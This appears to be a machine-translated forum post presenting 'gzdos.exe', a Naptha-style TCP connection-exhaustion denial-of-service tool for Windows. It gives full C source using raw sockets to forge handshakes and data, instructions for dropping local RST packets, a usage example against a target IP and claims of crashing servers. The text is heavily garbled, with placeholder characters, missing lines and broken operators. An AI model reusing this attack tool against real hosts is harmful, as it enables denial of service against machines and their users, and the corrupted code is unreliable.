Author: liond8
Email: liond8@126.com
Transfer from Jiakang
Test platform VC 6.0 windows2000 server
Target Platform Windows 2000, Windows XP
???? Suddenly, is inspired by Naptha attack, I hope to extend this fake connection to the personal PC and is not limited by this conditional factor in the LAN. I took time to study the things written below, I am not nonsense. Now take it out and everyone Share, it is not very mature, I hope to discuss with you.
???? About NAPTHA originally written a NaPTHA in 2000. Why use a local area network, just to be better hidden? There is also a more important factor to avoid your host's packets that have a second handshake from the remote host, prevent the system from emitting the RST package disconnects from the forged connection. In addition, there is no much impact on the Windows system for NAPTHA. How much memory consumes Windows. If the counter is refereated, the data is transferred again.
???? a is an attacker CA attacker:
???? a syn --------> C
???? a syn, Ack <----- c
???? a ACK --------> C
???? a send data -----> C
???? a Ack <-------- C
???? a send data -----> C
???? a Ack <-------- C
???? ...
Test Results:
???? For a general temporary port, it is quite effective for 1025 ports. Memory continues to rise Finally, the computer can cause a computer because there is no response, and the crash. 20 minutes can drag a web bar server.
???? For the 80-port maximum connection number 100, the effect is not very obvious, consumes 40M memory to start repeated, leaving a large amount of Fin_Wait_1 status and ESTABLISHED state.
???? For some other ports due to the limited environmental finite tests are quite inconvenient. Convenient friends can tell me your test results. Welcome to discuss.
So the following problems to solve are roughly 2:
1.Hook dropped the RST packet sent by this machine
???? Reference Flashsky Boss "Writing NDIS Filter Hook Drive Realization IP Packet Filter"
????
http://www.xfocus.net/articles/200210/457.html
???? Just modifying a line of code is OK.
Put IF (packet [13] == 0x2 && sendinterfaceIndex == invalid_pf_if_index)
Modified to IF (packet [13] == 0x4 && sendinterfaceIndex! = Invalid_pf_if_index)
See the original text in detail. The original text is very detailed.
2. Forgery data transmission
???? Through the Sniffer analysis, you must think that the counterfeit connection is also added to the option data when the SYN is sent, and negotiates the size of the packet capable of receiving. Otherwise, even if the other party is established, the other party does not return to accept the data, that is, if you want to consume the other party, you can't. For a general SYN scan, the TCP header length is 20 when NaPTHA requests to connect, and it is not optional data. For example, I am in 2000 is 8 bytes, and my friend's 2000 is 12 bytes. Taking my machine as an example 8 bytes, the TCP header length is 28 bytes. TCP_HEAD.TH_LENRES = 0x70.
There is also a place to point out that it is the calculation of the TCP header.
Ushort Checksum (Ushort * Buffer, int size)
{
???? Unsigned long cksum = 0; ???? while (size> 1)
???? {
???????? CKSUM = * buffer ;
???????? size - = sizeof (ushort);
????}
???? ing (size)
???? {
???????? cksum = * (uchar *) BUFFER;
????}
???? cksum = (CKSUM >> 16) (CKSUM & 0xFFF);
???? cksum = (CKSUM >> 16);
???? Return (Ushort) (~ CKSUM);
}
If there is data over 20 bytes of TCP headers, this and the Windows2000 system are not the same. It has a relationship after analysis and data length. If you say 20-byte IP headers, 20-bytes of TCP headers plus 2 bytes of data. If the TCP papers are calculated using Checksum and 0x4523. But the system is calculated 0x4323
and so:
TCPHEADER.TH_SUM = Checksum ((Ushort *) SzsendBuf, sizeof (psdheader) sizeof (tcpheader) DWSize
TCPHEADER.TH_SUM = HTONS (NTOHS (TCPHEADER.TH_SUM) - (USHORT) DWSIZE);
DWSIZE is the length of the data. Otherwise, the other party does not receive the forged packet. Then it is not possible to achieve the purpose of consuming the other party's memory.
Here is the test code. Considering the effect of this procedure or a certain harm, it is not written in a very convenient test program, and it is necessary to manually snifer option bytes. Then enter the option byte below the command line.
E.g:
Gzdos.exe 192.168.248.128 1025 020405b401010402 1000 65534
Gzdos.exe
Source code:
#include "stdio.h"
#include "winsock2.h"
#include "windows.h"
#include
#include "wchar.h"
#pragma comment (Lib, "WS2_32.LIB")
#define sio_rcvall ????????????? _ wsaiow (IOC_VENDOR, 1)
Char * ???? attackip = ???? "192.168.248.128";
Ushort ???? attackport = ???? 135;
Ushort ???? startport = 1;
INT ???????? SleepTime = ???? 2000;
Uchar * optbuf = null; ???? // ?? Option byte
Char * psend = NULL;
DWORD LEN = 0;
Ushort optlen = 0;
TYPEDEF STRUCT IP_HEAD ??????
{
???? unsigned char h_verlen; ????
???? Unsigned char TOS; ????????
???? unsigned short total_len;??
???????????????????????????????????????????????
???? Unsigned short Frag_and_flags;
???? unsigned char ttl; ????????
???? Unsigned char proto; ????
???? Unsigned short checksum;??
???? Unsigned int sourceip; ????
???? Unsigned int desip; ????????}} ipheader;
TYPEDEF STRUCT TCP_HEAD ??
{
???? ushort t_sport; ??????????
???? ushort t_dport; ?????????
???? Unsigned int th_seq; ??????
???? Unsigned int tr_ack; ??????
???? Unsigned char TH_LENRES; ??????
???? Unsigned char th_flag; ??????
???? ushort t_win; ??????????
???? ushort tr_sum; ??????????
???? ushort t_urp; ??????????
} TCPHEADER;
Typedef struct tsd_hdr ??
{
???? unsigned long saddr; ??
???? Unsigned long daddr; ??
????????????????????????????????????????????????????????????????
???? char ptcl; ??????????????
???? Unsigned short tcpl; ??
} PSDHeader;
Typedef struct attack_obj
{
???? DWORD ???? dwip;
???? ushort ???? uattackport [11];
???? Struct attack_obj * ???? next;
} Atobj;
Atobj * ???? listattack = 0;
BOOL ???? INITSTART ();
DWORD ???? gethostip ();
Ushort ???? checksum (ushort * buffer, int size);
DWORD ???? WinAPI ?? Threadsynflood (LPVOID LP);
Void ???? Senddata (DWORD SEQ, DWORD ACK, USHORT SPORT, USHORT APORT, DWORD SIP, DWORD AP, CHAR * PBUF, BOOL ISDATA, DWORD DWSIZE);
DWORD ?? WinAPI ?? ListeningFunc (LPVOID LPVOID);
Void ???? banner ();
Void Debugip (DWORD DWIP);
Void ConvertOpt (Char * PU);
Socket Sock = NULL;
Int main (int Argc, char * argv [])
{
???? banner ();
???? psend = (char *) Malloc (800);
???? MEMSET (Psend, 0x38, 799);
???? psend [799] = 0;
???? len = Strlen (psend);
???? IF (Argc <5)
???? {
???????? printf ("Input Error! / N");
???????? Return -1;
????}
???? attackip = strdup (argv [1]);
???? attackport = atoi (Argv [2]);
?????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????
???? converTopt (OPTBUFTEMP);
???? optbuf [3] - = 1;
???? if (argc == 5)
???????? Sleeptime = ATOI (Argv [4]);
???? i (argc == 6)
???? {
???????? Sleeptime = ATOI (Argv [4]);
???????? STARTPORT = ATOI (Argv [5]); ????}
???? char hostname [255] = {0};
???? i (initstart () == false)
???????? Return -1;
???? if (OptBuf! = null)
???? {
???????? INT i = 0;
???????? struct hostent * lp = null;
????????
???????? gethostname (Hostname, 255);
???????? lp = gethostbyname (Hostname);
???????? while (lp-> h_addr_list [i]! = null)
???????? {
???????????? Handle ???? h = null;
???????????? dword ???? dwip = 0;????
???????????? dwip = * (dword *) lp-> h_addr_list [i ];
???????????? H = CreateThread (Null, Null, ListeningFunc, (LPVOID) DWIP, NULL, NULL); ????????????
???????????? IF (h == null)
???????????? {
???????????????? printf ("CREATE LISTENINGFUNC Thread False! / N");
???????????????? return -1;
????????????}
???????????? SLEEP (500);
????????}
???????????? threadsynflood (null);
????}
???? Else return -1;
??
???? Sleep (5555555);
}
BOOL INITSTART ()
{
???? bool flag;
???? int ?? ntimeover;
???? wsadata wsadata;
???? IF (WSAStartup (MakeWord (2, 2), & WSADATA)! = 0)
???? {
???????? printf ("wsastartup error! / n");
???????? Return False;
????}
???? ListattackObj = (atobj *) Calloc (1, sizeof (atobj));
???? ListattackObj-> dwip = inet_addr (attack);
???? listattackobj-> uattackport [0] = HTONS (AttackPort);
???? listattackobj-> uattackport [1] = 0;
???? listattackobj-> next = null;
???? suck = null;
???? ing ((sock = socket (AF_INET, SOCK_RAW, IPPROTO_IP)) == Invalid_socket)
???? {
???????? printf ("socket setup error! / n");
???????? Return False;
????}
???? flag = true;
???? IF (setsock, ipproto_ip, ip_hdrincl, (char *) & flag, sizeof (flag)) == Socket_ERROR)
???? {
???????? printf ("setsockopt ip_hdrincl error! / n"); ???????? Return False;
????}
???? ntimeover = 2000;
???? i (setsockopt (sock, sol_socket, so_sndtimeo, (char *) & ntimeover, sizeof (ntimeover)) == SOCKET_ERROR) ???????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????? ??????????? // set the time to send
???? {
???????? Printf ("setsockopt so_sndtimeo error! / n");
???????? Return False;
????} ????
???? Return True;
}
DWORD ?? WinApi ?? Threadsynflood (LPVOID LP)
{
???? atobj * Patobj = listattackobj;
???? suckaddr_in addr_in;
???? ipheader ipheader;
???? tcpheader tcpheader;
???? psdheader psdheader;
????? char szsendbuf [1024] = {0};
???? I = 0;
???? while (?? patobj! = null)
???? {
???????? addr_in.sin_family = AF_INET
???????? addr_in.sin_addr.s_un.s_addr = Patobj-> dwip;
???????? ipheader.h_verlen = (4 << 4 | sizeof (ipheader) / sizeof (unsigned long);
???????? ipHeader.tos = 0;
???????? ipheader.total_len = htons (sizeof (ipheader) ipTlen; ???? // IP length
???????? ipHeader.Ident = 1;
???????? ipheader.frag_and_flags = 0x0040; ????????????????
???????? ipHeader.ttl = 0x80; ????????
???????? ipheader.proto = ipproto_tcp;
???????? ipHeader.checksum = 0;
???????? ipHeader.Destip = Patobj-> dwip;
???????? ipheader.sourceIP = gethostip ();
???????? tcpheader.th_ack = 0; ????
???????? tcpheader.th_lenres = (Optlen / 4 5) << 4;
???????? tcpheader.th_flag = 2; ????????????
???????? tcpheader.th_win = HTONS (0x4470);
???????? tcpheader.th_urp = 0;
???????? tcpheader.th_seq = htonl (0x00198288);
???????? for (int L = Startport; L <65535; l )
???????? {
???????????? INT K = 0;
???????????? while (Patobj-> uattackport [k]! = 0)
???????????? {
???????????????? tcpheader.th_dport = Patobj-> uattackport [k ]; ???????????????? psdheader.daddr = ipheader. Destip;
???????????????? psdheader.mbz = 0;
???????????????? psdheader.ptcl = ipproto_tcp;
???????????????? psdheader.tcpl = HTONS (SIZEOF (TCPHEADER));
???????????????? INT sentnum = 0; ????????????
???????????????? INT OPTLENTEMP = OPTLEN
????????????????? tcpheader.th_sport = HTONS (L);
???????????????? tcpheader.th_sum = 0;
???????????????? psdheader.saddr = ipheader.sourceIP;
???????????????? Memcpy (SzsendBuf, & PSDHeader, Sizeof (PSDHeader));
???????????????? Memcpy (szsendbuf sizeof (psdheader), & tcpheader, sizeof (tcpheader);
???????????????? Memcpy (SzsendBuf SizeOf (PSDHeader) SizeOf (TCPHEADER), OPTBUF, OPTLENTEMP
???????????????? tcpheader.th_sum = checksum ((ushort *) szsendbuf, sizeof (psdheader) sizeof (tcpheader) OptlenTemp);
???????????????? TCPHEADER.TH_SUM = HTONS (NTOHS (TCPHEADER.TH_SUM) - (USHORT) OPTLENTEMP); ????????
???????????????? Memcpy (SizsendBuf, & ipheader, sizeof (ipheader));
???????????????? Memcpy (ipsendbuf sizeof (ipheader), & tcpheader, sizeof (tcpheader);
???????????????? Memcpy (IpsendBuf SizeOf (Ipheter) SizeOf (TCPHEADER), OPTBUF, OPTLENTEMP;
????????????????? Int Rect = sendto (SOCK, SZSENDBUF, SIZEOF (Ipheter) Sizeof (TCPHEADER) OptlenTemp, 0, (Struct Sockaddr *) & addr_in, sizeof (addr_in) );
???????????????? f (sendnum > 10)
???????????????? {
???????????????????? sendnum = 0;
?????????????????}
???????????????? IF (RECT == Socket_ERROR)
???????????????? {
???????????????????? printf ("Send Error!:% X / N", wsagetlasterror ());
???????????????????? Return False;
?????????????????}
?????????????????????? printf ("??????????? SEND OK% D / N", L);??? ??????????????????????????????} // endewile
???????????? Sleep (SleepTime);??
????????}
???????? patobj = patobj-> next
????}
???? Return 0;
}
DWORD gethostip ()
{
???? DWORD dwip = 0;
???? I = 0;
???? Struct hostent * lp = null;
???? char hostname [255] = {0};
???? gethostname (Hostname, 255);
???? lp = gethostbyname (Hostname);
???? while (lp-> h_addr_list [i]! = null)
???????? i ;
???? dwip = * (dword *) lp-> h_addr_list [- i];
???? Return DWIP;
}
????
Ushort Checksum (Ushort * Buffer, int size)
{
???? Unsigned long CKSUM = 0;
???? while (size> 1)
???? {
???????? CKSUM = * buffer ;
???????? size - = sizeof (ushort);
????}
???? ing (size)
???? {
???????? cksum = * (uchar *) BUFFER;
????}
???? cksum = (CKSUM >> 16) (CKSUM & 0xFFF);
???? cksum = (CKSUM >> 16);
???? Return (Ushort) (~ CKSUM);
}
DWORD ?? WinApi ?? listeningfunc (lpvoid lpvoid)
{
???? Socket Rawsock;
???? suckaddr_in addr_in = {0};
???? ing ((Rawsock = Socket (AF_INET, SOCK_RAW, IPPROTO_IP) == Invalid_socket)
???? {
???????? printf ("Sniffer Socket Setup Error! / N");
???????? Return False;
????}
???? addr_in.sin_family = AF_INET;
???? addr_in.sin_port = htons (8288);
???? addr_in.sin_addr.s_un.s_addr = (dword) LPVOID;
???? // Bind the RawSock native IP and port
???? int RET = BIND (Rawsock, (Struct SockAddr *) & addr_in, sizeof (addr_in));
???? if (return == socket_error)
???? {
???????? printf ("bind false / n");
???????? EXIT (0);
????}
???? dword lpvbuffer = 1;
???? DWord LPCBBYTESRETURNED = 0;
???? WSAIOCTL (Rawsock, SiO_RCVALL, & LPVBUFFER, SIZEOF (LPVBUFFER), NULL, 0, & LPCBBYTESRETURNED, NULL, NULL); ???? While (TRUE)
???? {
???????? SockAddr_in from = {0};
???????? int ?? size = sizeof (from);
???????? char recvbuf [256] = {0};
???????? // receive packets
???????? RET = Recvfrom (Rawsock, Recvbuf, Sizeof (Recvbuf), 0, (Struct SockAddr *) & from, & size);
???????? ife (ret! = socket_error)
???????? {
???????????? // analyze the data package
???????????? ipheader * lpipheader;
???????????? lpipheader = (ipHeader *) Recvbuf;
???????????? f (lpipheader-> proto == ipproto_tcp && lpipheader-> sourceip == inet_addr (attack))
???????????? {
????????????
???????????????? TCPHEADER * LPTCPHEADER = (TCVBUF SIZEOF (IpHeader);
????????????????? // judgment is the packet returned by the remote open port
???????????????? IF (lptcpheader-> th_flag == 0x12)
???????????????? {
????????????????????? IF (LPTCPHEADER-> TH_ACK == HTONL (0x00198289))
???????????????????? {// forged the third time
???????????????????????? Senddata (LPTCPHEADER-> TH_ACK, HTONL (NtoHL (LPTCPHEADER-> TH_SEQ) 1), /
????????????????????????????????????????????????????????????????????????????????????????????????????? ;
????????????????????????? // actively issued a data
???????????????????????? Senddata (LPTCPHEADER-> TH_ACK, HTONL (NtoHL (LPTCPHEADER-> TH_SEQ) 1), /
???????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????? ;
????????????????????}
????????????????
?????????????????}
???????????????? ELSE
???????????????? {
????????????????????? IF (LPTCPHEADER-> TH_FLAG == 0x10)
???????????????????? // continued to send data
???????????????????? Senddata (LPTCPHEADER-> TH_ACK, LPTCPHEADER-> TH_SEQ, / ????????????????? ??? LPTCPHEADER-> TH_DPORT, LPTCPHEADER-> TH_SPORT, LPPIPHEADER-> DESTIP, LPPHEADER-> SOURCEIP, PSEND, TRUE, LEN;
?????????????????}
????????????} ????????????
????????????
????????}
????} ???? @ il While
}
Void Senddata (DWord SEQ, DWORD ACK, USHORT SPORT, USHORT APORT, DWORD SIP, DWORD AP, CHAR * PBUF, BOOL ISDATA, DWORD DWSIZE)
{
??
???? suckaddr_in addr_in;
???? ipheader ipheader;
???? tcpheader tcpheader;
???? psdheader psdheader;
????? char szsendbuf [1024] = {0};
???? addr_in.sin_family = AF_INET;
???? addr_in.sin_port = Aport;
???? addr_in.sin_addr.s_un.s_addr = AIP;
???? ipheader.h_verlen = (4 << 4 | sizeof (ipheader) / sizeof (unsigned long);
???? ipHeader.tos = 0;
???? ipheader.Ident = 1;
???? ipHeader.frag_and_flags = 0x0040; ?????????????????
???? ipHeader.ttl = 0x80; ????????
???? ipHeader.proto = ipproto_tcp;
???? ipheader.checksum = 0;
???? ipHeader.destip = AIP;
???? ipheader.sourceip = SIP;
???? tcpheader.th_dport = Aport;
???? TCPHEADER.TH_ACK = ACK;??
???? tcpheader.th_lenres = (SIZEOF (TCPHEADER) / 4 << 4 | 0);
???? tcpheader.th_seq = seq;
???? tcpheader.th_win = htons (0x4470);
???? tcpheader.th_sport = Sport;
???? ipheader.total_len = htons (sizeof (ipheader) sizeof (tcpheader) dwsize;
???? if (! isdata)
???? {
???????? tcpheader.th_flag = 0x10;
????
????} // ???? ACK ??
???? Else
???? {
???????? tcpheader.th_flag = 0x18;
????}
???? tcpheader.th_urp = 0;
???? psdheader.daddr = ipheader.destip;
???? psdheader.mbz = 0;
???? psdheader.ptcl = ipproto_tcp;
???? psdheader.tcpl = htons (sizeof (tcpheader)); ????
???? tcpheader.th_sum = 0;
???? psdheader.saddr = ipheader.sourceip; ???? Memcpy (szsendbuf, & psdheader, sizeof (psdheader));
???? Memcpy (SzsendBuf Sizeof (Psdheader), & Tcpheader, Sizeof (TCPHEADER));
???? if (pbuf! = null)
???? {????
???????? Memcpy (szsendbuf sizeof (psdheader) sizeof (tcpheader), PBUF, DWSIZE
???????? tcpheader.th_sum = checksum ((ushort *) szsendbuf, sizeof (psdheader) sizeof (tcpheader) dwsize;
???????? tcpheader.th_sum = htons (ntohs (tcpHeader.th_sum) - (Ushort) Dwsize;
????}
???? Else
???? {
???????? tcpheader.th_sum = checksum ((USHORT *) SZSENDBUF, SIZEOF (PSDHEADER) SIZEOF (TCPHEADER));
????}
???? Memcpy (Szsendbuf, & ipheader, sizeof (ipheader));
???? Memcpy (szsendbuf sizeof (ipheader), & tcpheader, sizeof (tcpheader));
???? int RECT = 0;
???? if (pbuf == null)
???????? RECT = Sendto (Sock, SzsendBuf, SizeOf (Ipheter) Sizeof (TCPHEADER), 0, (Struct SockAddr *) & addr_in, sizeof (addr_in));
???? Else
???? {
???????? Memcpy (IpsendBuf sizeof (iPheter) sizeof (TCPHEADER), PBUF, DWSIZE
???????? Rect = Sendto (Sock, SzsendBuf, SizeOf (Ipheader) SizeOf (TCPHEADER) DWSIZE, 0, (Struct SockAddr *) & addr_in, sizeof (addr_in));
????}
???? if (Rect == Socket_ERROR)
???? {
???????? Printf ("Send Error!:% X / N", Wsagetlasterror ());
???????? Return;
????}
???? ELSE ????
???? {
???????? IF (PBUF! = NULL)
???????????? printf ("SendData OK% D / N", NTOHS (Sport);
???????? ELSE
???????????? printf ("??????????????????? SENDACK OK% D / N", NTOHS (SPORT));
????}
}
Void banner ()
{
???? printf ("***************************************** ********* / n ");
????printf ("?????????????????? Dog D. O.S TEST / N");
???? printf ("Maker by liond8. QQ: 10415468. Email: liond8@eyou.com/n"); ???? printf ("???? Welcome to my Website:
http://liond8.126.com/n ");
???? printf ("?? is only available for licensed tests, otherwise it will cause any legal dispute to be self-contained / N");
???? printf ("***************************************** ********* / n ");
????printf ("gzdos.exe
/ N ");
}
Void Debugip (DWORD DWIP)
{
???? Struct in_addr a = {0};
???? a.s_un.s_addr = dwip;
???? Printf ("% s", inet_ntoa (a));
}
Void Convertopt (Char * PU)
{
???? I = 0, LENTEMP;
???? LENTEMP = STRLEN (PU);
??? optlen = LENTEMP / 2;
???? optbuf = (uchar *) Malloc (Optlen);
???? INT K = 0;
???? for (i = 0; I ???? { ???????? Byte tempb = 0; ???????? Tempb = pu [i 1]; ???????? IF (Tempb <'9') ???????????? TEMPB = TEMPB - 0X30; ???????? ELSE ???????? { ???????????? TEMPB = TEMPB - 0X37; ????????} ???????? Optbuf [k] = TEMPB; ???????? TEMPB = 0; ???????? tempb = pu [i]; ???????? IF (Tempb <'9') ???????????? TEMPB = TEMPB - 0X30; ???????? ELSE ???????? { ???????????? TEMPB = TEMPB - 0X37; ????????} ???????? TEMPB = TEMPB << 4; ???????? Optbuf [k] = TEMPB; ???????? k ; ????} } references: Writing NDIS filter hook driver Implement IP package filter TCP / IP detail the first volume